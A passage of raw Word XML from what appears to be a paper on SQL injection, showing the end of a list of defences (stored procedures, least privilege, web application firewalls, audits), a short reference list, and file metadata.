          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">     ```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AEAE58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Stored Procedures: Use stored procedures to encapsulate SQL code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1A75B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. Least Privilege Principle: Limit database permissions to only what is necessary for the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14D84C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. Web Application Firewalls (WAF): Implement WAFs to filter and monitor HTTP traffic for attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C69273">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6. Regular Security Audits: Conduct frequent security assessments and penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB9503">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCBD58C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C4B5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137DBAA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. OWASP (Open Web Application Security Project). (2023). "SQL Injection." [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF229E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Halfond, W. G. J., &amp; Orso, A. (2005). "Preventing SQL Injection Attacks." IEEE International Conference on Software Engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C733DA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Seacord, R. C. (2013). "Secure Coding in C and C++." Addison-Wesley Professional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F8736">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4. SQL Injection. (2023). In Wikipedia. [Wikipedia SQL Injection](https://en.wikipedia.org/wiki/SQL_injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB15A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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V Boli">
    <w:panose1 w:val="02000500030200090000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="000001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2"/>
  <w:doNotDisplayPageBoundaries w:val="1"/>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2C47D5"/>
    <w:rsid w:val="259143DC"/>
    <w:rsid w:val="2EFF11C6"/>
    <w:rsid w:val="362C47D5"/>
    <w:rsid w:val="51AC7EB7"/>
    <w:rsid w:val="55214CEF"/>
    <w:rsid w:val="5EB73E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12</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2024-11-04T11:58:00Z</dcterms:created>
  <dc:creator>Yahaiya</dc:creator>
  <cp:lastModifiedBy>WPS_1727873086</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-06T10:33:22Z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8EA7ADB37D6B49F081ED15E4DE2D15DE_11</vt:lpwstr>
  </property>
</Properties>
</file>